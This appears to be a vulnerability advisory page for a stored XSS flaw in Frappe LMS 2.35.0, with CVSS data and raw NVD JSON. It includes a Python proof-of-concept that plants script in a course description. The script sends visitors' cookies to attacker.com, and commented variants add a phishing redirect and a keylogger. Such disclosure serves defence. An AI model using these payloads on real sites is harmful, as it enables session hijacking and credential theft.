Security Vulnerability Report
中文
CVE-2025-11283 CVSS 2.4 LOW

CVE-2025-11283

Published: 2025-10-05 05:15:32
Last Modified: 2026-04-29 01:00:02
Source: [email protected]

Description

A vulnerability was determined in Frappe LMS 2.35.0. This affects an unknown function of the component Course Handler. Executing manipulation of the argument Description can lead to cross site scripting. The attack can be executed remotely. The exploit has been publicly disclosed and may be utilized. It is suggested to upgrade the affected component. The vendor was informed early about a total of four security issues and confirmed that those have been fixed. However, the release notes on GitHub do not mention them.

CVSS Details

CVSS Score
2.4
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:frappe:learning:2.35.0:*:*:*:*:*:*:* - VULNERABLE
Frappe LMS 2.35.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-11283 - Frappe LMS 2.35.0 Stored XSS PoC # Vulnerability: Stored XSS in Course Handler - Description parameter # Author: 0xHamy # Reference: https://gist.github.com/0xHamy/1f99795df9301a95ee0c6d18028cd3da import requests # Target configuration TARGET_URL = "https://target-frappe-lms.com" SESSION_COOKIE = "your_session_cookie_here" # Requires admin/high-privilege session # Step 1: Authenticate and obtain session (if not already authenticated) session = requests.Session() session.cookies.set("sid", SESSION_COOKIE) # Step 2: Craft malicious payload for the Description field # The payload will execute JavaScript in the victim's browser context xss_payload = """ <div class="course-description"> <h2>Welcome to the Course</h2> <script> // Steal session cookies and send to attacker's server fetch('https://attacker.com/steal?cookie=' + document.cookie); // Alternative: Redirect to phishing page // window.location = 'https://attacker.com/phishing'; // Alternative: Keylogger // document.addEventListener('keypress', function(e) { // fetch('https://attacker.com/log?key=' + e.key); // }); </script> <img src=x onerror="fetch('https://attacker.com/steal?cookie='+document.cookie)"> </div> """ # Step 3: Send the malicious course description via Course Handler API course_data = { "title": "Introduction to Security", "description": xss_payload, "category": "Security", "instructor": "admin" } # Step 4: Submit the crafted payload response = session.post( f"{TARGET_URL}/api/method/lms.lms.doctype.lms_course.lms_course.create_course", json=course_data, headers={ "Content-Type": "application/json", "X-Frappe-CSRF-Token": "your_csrf_token_here" } ) # Step 5: Verify the payload was stored if response.status_code == 200: print(f"[+] XSS payload successfully stored in course description") print(f"[+] Course ID: {response.json().get('message', {}).get('name')}") print(f"[+] When a victim views this course, the script will execute") else: print(f"[-] Failed to store payload: {response.status_code}") print(f"[-] Response: {response.text}") # Steps to Reproduce (Manual): # 1. Login to Frappe LMS as an admin or user with course creation privileges # 2. Navigate to Course creation/editing page # 3. In the Description field, inject: <script>alert(document.cookie)</script> # 4. Save the course # 5. When any user (including unauthenticated viewers) accesses the course page, # the JavaScript will execute in their browser context

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11283", "sourceIdentifier": "[email protected]", "published": "2025-10-05T05:15:31.500", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was determined in Frappe LMS 2.35.0. This affects an unknown function of the component Course Handler. Executing manipulation of the argument Description can lead to cross site scripting. The attack can be executed remotely. The exploit has been publicly disclosed and may be utilized. It is suggested to upgrade the affected component. The vendor was informed early about a total of four security issues and confirmed that those have been fixed. However, the release notes on GitHub do not mention them."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.9, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N", "baseScore": 2.4, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.9, "impactScore": 1.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:M/C:N/I:P/A:N", "baseScore": 3.3, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "MULTIPLE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "NONE"}, "baseSeverity": "LOW", "exploitabilityScore": 6.4, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}, {"lang": "en", "value": "CWE-94"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:frappe:learning:2.35.0:*:*:*:*:*:*:*", "matchCriteriaId": "A4798441-F3FA-420C-B28E-7DB3096A2A2B"}]}]}], "references": [{"url": "https://gist.github.com/0xHamy/1f99795df9301a95ee0c6d18028cd3da", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://gist.github.com/0xHamy/1f99795df9301a95ee0c6d18028cd3da#steps-to-reproduce", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.327017", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.327017", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.659697", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.